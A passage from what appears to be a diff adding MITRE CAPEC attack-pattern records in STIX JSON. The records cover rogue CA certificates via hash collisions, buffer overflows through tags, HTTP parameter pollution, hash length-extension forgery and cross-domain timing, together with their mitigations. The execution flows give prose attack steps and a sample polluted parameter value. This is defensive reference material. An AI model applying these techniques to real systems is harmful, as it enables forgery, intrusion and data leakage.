characteristics of flash memory based attacks is that the malicious code can survive even a total format of the hard-drive and reinstallation of the host operating system. Virtually any device which can be integrated into a computer system is susceptible to these attacks. Additionally, any peripheral device which interfaces with the computer bus could extract or sniff confidential data, even on systems employing full-disk encryption. Trojan code placed into a video card's chipset would continue to perform its function irrespective of the host operating system, and would be invisible to all known antivirus. The threats extend to consumer products such as camcorders, digital cameras, or any consumer electronic device with an embedded microcontroller.\n ", + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness resulting from using a hashing algorithm with weak collision resistance to generate certificate signing requests (CSR) that contain collision blocks in their \"to be signed\" parts. The adversary submits one CSR to be signed by a trusted certificate authority then uses the signed blob to make a second certificate appear signed by said certificate authority. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the adversary's second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority.", + "external_references": [ + { + "external_id": "CAPEC-459", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/459.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-295", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/295.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": "Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger, MD5 Considered Harmful Today: Creating a Rogue CA Certificate, 2008--12---30, Phreedom.org", + "external_id": "REF-395", + "source_name": "reference_from_CAPEC", + "url": "http://www.phreedom.org/research/rogue-ca/" + }, + { + "description": "Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger, MD5 considered harmful today, 2009--12", + "external_id": "REF-587", + "source_name": "reference_from_CAPEC", + "url": "https://www.win.tue.nl/hashclash/rogue-ca/#Ref" + } + ], + "id": "attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Creating a Rogue Certification Authority Certificate", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n MD5 Collisions\n The MD5 algorithm is not collision resistant, allowing attackers to use spoofing attacks to create rogue certificate Authorities.See also: CVE-2004-2761", + "\n SHA1 Collisions\n The SHA1 algorithm is not collision resistant, allowing attackers to use spoofing attacks to create rogue certificate Authorities.See also: CVE-2005-4900", + "\n PKI Infrastructure vulnerabilities\n Research has show significant vulnerabilities in PKI infrastructure. Trusted certificate authorities have been shown to use weak hashing algorithms after attacks have been demonstrated against those algorithms. Additionally, reliable methods have been demonstrated for generated MD5 collisions that could be used to generate malicious CSRs.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. Craft Certificates: The adversary crafts two different, but valid X.509 certificates that when hashed with an insufficiently collision resistant hashing algorithm would yield the same value.

  2. Send CSR to Certificate Authority: The adversary sends the CSR for one of the certificates to the Certification Authority which uses the targeted hashing algorithm. That request is completely valid and the Certificate Authority issues an X.509 certificate to the adversary which is signed with its private key.

Exploit

  1. Insert Signed Blob into Unsigned Certificate: The adversary takes the signed blob and inserts it into the second X.509 certificate that the attacker generated. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob is valid in the second certificate. The result is two certificates that appear to be signed by a valid certificate authority despite only one having been signed.

", + "x_capec_extended_description": "\n Alternatively, the second certificate could be a signing certificate. Thus the adversary is able to start their own Certification Authority that is anchored in its root of trust in the legitimate Certification Authority that has signed the attacker's first X.509 certificate. If the original Certificate Authority was accepted by default by browsers, so will the Certificate Authority set up by the adversary and any certificates that it signs. As a result, the adversary is able to generate any SSL certificates to impersonate any web server, and the user's browser will not issue any warning to the victim. This can be used to compromise HTTPS communications and other types of systems where PKI and X.509 certificates may be used (e.g., VPN, IPSec).\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Certification Authority is using a hash function with insufficient collision resistance to generate the certificate hash to be signed" + ], + "x_capec_resources_required": [ + "Knowledge of a certificate authority that uses hashing algorithms with poor collision resistance", + "A valid certificate request and a malicious certificate request with identical hash values" + ], + "x_capec_skills_required": { + "High": "An attacker must be able to craft two X.509 certificates that produce the same hash value", + "Medium": "Knowledge needed to set up a certification authority" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Certification Authorities need to stop using deprecated or cryptographically insecure hashing algorithms to hash the certificates that they are about to sign. Instead they should be using stronger hashing functions such as SHA-256 or SHA-512.", + "id": "course-of-action--aef26c23-42e4-46ac-a6ce-61224191c8a3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-459-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--323c57c1-b086-4b0d-81cb-1cf8a0bb21d3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aef26c23-42e4-46ac-a6ce-61224191c8a3", + "target_ref": "attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack leverages the use of tags or variables from a formatted configuration data to cause buffer overflow. The adversary crafts a malicious HTML page or configuration file that includes oversized strings, thus causing an overflow.", + "external_references": [ + { + "external_id": "CAPEC-46", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/46.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Overflow Variables and Tags", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A buffer overflow vulnerability exists in the Yamaha MidiPlug that can be accessed via a Text variable found in an EMBED tag.See also: CVE-1999-0946", + "\n A buffer overflow in Exim allows local users to gain root privileges by providing a long :include: option in a .forward file.See also: CVE-1999-0971" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. Adversaries look for applications or programs that accept formatted files, such as configuration files, as input.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

    2. Techniques
    Knowing the type of file that an application takes as input, the adversary takes a normal input file and modifies a single variable or tag to contain a large amount of data. If there is a crash, this means that a buffer overflow attack is possible. The adversary will keep changing single variables or tags one by one until they see a change in behavior.

  2. Craft overflow content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

    3. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: The adversary will upload the crafted file to the application, causing a buffer overflow.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e" + ], + "x_capec_prerequisites": [ + "The target program consumes user-controllable data in the form of tags or variables.", + "The target program does not perform sufficient boundary checking." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0cad5809-fa6b-4947-9d83-2c2e462c3f42", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eaa7c808-388e-4b0b-a9c7-56895d4b1188", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--45d81297-fcc7-4abb-88f9-43cae938e07e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a2abe8d6-7c9a-4465-ad34-052a868dc3b0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not trust input data from user. Validate all user input.", + "id": "course-of-action--4d65b6e1-548b-4925-96e0-a2948cea8f7e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-46-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--933f0265-0d58-4da3-be7f-f584f3b4b55b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4d65b6e1-548b-4925-96e0-a2948cea8f7e", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary adds duplicate HTTP GET/POST parameters by injecting query string delimiters. Via HPP it may be possible to override existing hardcoded HTTP parameters, modify the application behaviors, access and, potentially exploit, uncontrollable variables, and bypass input validation checkpoints and WAF rules.", + "external_references": [ + { + "external_id": "CAPEC-460", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/460.html" + }, + { + "external_id": "CWE-88", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html" + }, + { + "external_id": "CWE-147", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/147.html" + }, + { + "external_id": "CWE-235", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/235.html" + }, + { + "description": "Web Parameter Tampering", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Web_Parameter_Tampering" + }, + { + "description": "Luca Carettoni, Stefano di Paola, HTTP Parameter Pollution (OWASP EU09 Poland), 2008, The Open Web Application Security Project (OWASP)", + "external_id": "REF-397", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-606", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution.html" + } + ], + "id": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "modified": "2022-02-22T00:00:00.000Z", + "name": "HTTP Parameter Pollution (HPP)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e" + ], + "x_capec_child_of_refs": [ + "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find User Input: The adversary finds anywhere in the web application that uses user-supplied input in a form or action. This can also be found by looking at parameters in the URL in the navigation bar of the browser

Experiment

  1. Add Duplicate Parameter Values: Once the adversary has identified what user input is used as HTTP parameters, they will add duplicates to each parameter one by one to observe the results. If the response from the HTTP request shows the duplicate parameter value concatenated with the original parameter value in some way, or simply just the duplicate parameter value, then HPP is possible.

    2. Techniques
    In the URL, add a duplicate parameter by using the \"&\" delimiter. For example \"par1=val1\" becomes \"par1=val1&par1=val2\". Depending on the backend API, this could be treated as \"par1=val1, val2\", which could lead to par1 being set to val2, ignoring val1.
    If the request is created based on user input directly on the page, the adversary will test by adding an encoded delimiter to the input. For example, the adverary might supply \"1000%26action=withdraw\" and the backend might interpret a POST request with the paramters \"action=deposit&amount=1000&action=withdraw\"

Exploit

  1. Leverage HPP: Once the adversary has identified how the backend handles duplicate parameters, they will leverage this by polluting the paramters in a way that benefits them. In some cases, hardcoded parameters will be disregarded by the backend. In others, the adversary can bypass a WAF that might only check a parameter before it has been concatenated by the backend, resulting in malicious queries getting through.

", + "x_capec_prerequisites": [ + "HTTP protocol is used with some GET/POST parameters passed" + ], + "x_capec_resources_required": [ + "Any tool that enables intercepting and tampering with HTTP requests" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: If using a Web Application Firewall (WAF), filters should be carefully configured to detect abnormal HTTP requests", + "id": "course-of-action--fa76a44a-7309-4edc-96e7-8994b9b72371", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-460-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d1f5c4e8-5bc1-44be-a928-3f47b794cce5", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fa76a44a-7309-4edc-96e7-8994b9b72371", + "target_ref": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Perform URL encoding", + "id": "course-of-action--a8f935d9-6238-4a25-98d1-ec2b90cf2dc5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-460-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c9d7213f-0542-4267-896f-cde00d9ba131", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a8f935d9-6238-4a25-98d1-ec2b90cf2dc5", + "target_ref": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use strict regular expressions in URL rewriting", + "id": "course-of-action--38331521-a7db-4428-92ae-dcc62432d4be", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-460-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--48510a25-def9-4c25-85ee-67173f7f2246", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--38331521-a7db-4428-92ae-dcc62432d4be", + "target_ref": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Beware of multiple occurrences of a parameter in a Query String", + "id": "course-of-action--8846dae1-8419-4e74-8ec5-58bff613dbec", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-460-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--315c1643-cc8e-472e-8bbc-264b098bf84b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8846dae1-8419-4e74-8ec5-58bff613dbec", + "target_ref": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary utilizes a hash function extension/padding weakness, to modify the parameters passed to the web service requesting authentication by generating their own call in order to generate a legitimate signature hash (as described in the notes), without knowledge of the secret token sometimes provided by the web service.", + "external_references": [ + { + "external_id": "CAPEC-461", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/461.html" + }, + { + "external_id": "CWE-328", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/328.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": "Thai Duong, Juliano Rizzo, Flickr's API Signature Forgery Vulnerability, 2009--09---28", + "external_id": "REF-398", + "source_name": "reference_from_CAPEC", + "url": "http://netifera.com/research/flickr_api_signature_forgery.pdf" + } + ], + "id": "attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Web Services API Signature Forgery Leveraging Hash Function Extension Weakness", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "To leverage an attack against the has function extension / padding weakness, consider the message to be passed to the web service is M (this message includes the parameters passed to the web service concatenated with the secret token / key bytes). The message M is hashed and that hash is passed to the web service and is used for authentication. The attacker does not know M, but can see Hash (M) and Length (M). The attacker can then compute Hash (M || Padding (M) || M') for any M'. The attacker does not know the entire message M, specifically the attacker does not know the secret bytes, but that does not matter. The attacker is still able to sign their own message M' and make the called web service verify the integrity of the message without an error." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find a vulnerable web service: The adversary finds a web service that uses a vulnerable authentication scheme, where an authentication token is concatenated with the parameters of a request and then hashed

    2. Techniques
    Read application documentation to learn about authentication schemes being used
    Observe web service traffic to look for vulnerable authentication schemes

Experiment

  1. Attempt adding padding to parameters: An adversary tests if they can simply add padding to the parameters of a request such that the request is technically changed, with the hash remaining the same

    2. Techniques
    Exploit the hash function extension / padding weakness with only padding to test the weakness

Exploit

  1. Add malicious parameters to request: Add malicious parameters to a captured request in addition to what is already present. Do this by exploiting the padding weakness of the hash function and send the request to the web service so that it believes it is authenticated and acts on the extra parameters.

    2. Techniques
    Exploit the hash function extension / padding weakness by adding malicious parameters to a web service request such that it is still deemed authentic
", + "x_capec_extended_description": "\n When web services require callees to authenticate, they sometimes issue a token / secret to the caller that the caller is to use to sign their web service calls. In one such scheme the caller, when constructing a request, would concatenate all of the parameters passed to the web service with the provided authentication token and then generate a hash of the concatenated string (e.g., MD5, SHA1, etc.). That hash then forms the signature that is passed to the web service which is used on the server side to verify the origin authenticity and integrity of the message. Because of the iterative design of the hash function, it is possible, from only the hash of a message and its length, for an adversary to conduct signature forgery by computing the hash of longer messages that start with the initial message and include the padding required for the initial message to reach a multiple of 512 bits. It is important to note that the attack not limited to MD5 and will work on other hash functions such as SHA1.\n ", + "x_capec_prerequisites": [ + "Web services check the signature of the API calls", + "Authentication tokens / secrets are shared between the server and the legitimate client", + "The API call signature is generated by concatenating the parameter list with the shared secret and hashing the result.", + "An iterative hash function like MD5 and SHA1 is used.", + "An attacker is able to intercept or in some other way gain access to the information passed between the legitimate client and the server in order to retrieve the hash value and length of the original message.", + "The communication channel between the client and the server is not secured via channel security such as TLS" + ], + "x_capec_resources_required": [ + "\n Access to a function to produce a hash (e.g., MD5, SHA1)\n Tools that allow the attacker to intercept a message between the client and the server, specifically the hash that is the signature and the length of the original message concatenated with the secret bytes\n " + ], + "x_capec_skills_required": { + "Medium": "Medium level of cryptography knowledge, specifically how iterative hash functions work. This is needed to select proper padding." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use a secure message authentication code (MAC) function such as an HMAC-SHA1", + "id": "course-of-action--4f8988fb-2aec-4c9c-bd03-a3c8ca7fed94", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-461-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73e90459-19d2-486f-ab40-7a72b5bc43fa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f8988fb-2aec-4c9c-bd03-a3c8ca7fed94", + "target_ref": "attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker initiates cross domain HTTP / GET requests and times the server responses. The timing of these responses may leak important information on what is happening on the server. Browser's same origin policy prevents the attacker from directly reading the server responses (in the absence of any other weaknesses), but does not prevent the attacker from timing the responses to requests that the attacker issued cross domain.", + "external_references": [ + { + "external_id": "CAPEC-462", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/462.html" + }, + { + "external_id": "CWE-385", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/385.html" + }, + { + "external_id": "CWE-352", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html" + }, + { + "external_id": "CWE-208", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/208.html" + }, + { + "description": "Chris Evans, Cross-Domain Search Timing, 2009--12---11", + "external_id": "REF-399", + "source_name": "reference_from_CAPEC", + "url": "http://scarybeastsecurity.blogspot.com/2009/12/cross-domain-search-timing.html" + } + ], + "id": "attack-pattern--5871f734-1898-4509-860c-f418cdf6b2ac", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cross-Domain Search Timing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine service to send cross domain requests to: The adversary first determines which service they will be sending the requests to

Experiment

  1. Send and time various cross domain requests: Adversaries will send a variety of cross domain requests to the target, timing the time it takes for the target to respond. Although they won't be able to read the response, the adversary can use the time to infer information about what the service did upon receiving the request.

    2. Techniques
    Using a GET request, leverage the \"img\" tag in conjunction with \"onload() / onerror()\" javascript events to time a response
    Using a POST request, leverage the \"iframe\" element and use the \"onload()\" event to time a response

Exploit

  1. Infer information from the response time: After obtaining reponse times to various requests, the adversary will compare these times and infer potentially sensitive information. An example of this could be asking a service to retrieve information and random usernames. If one request took longer to process, it is likely that a user with that username exists, which could be useful knowledge to an adversary.

    2. Techniques
    Compare timing of different requests to infer potentially sensitive information about a target service
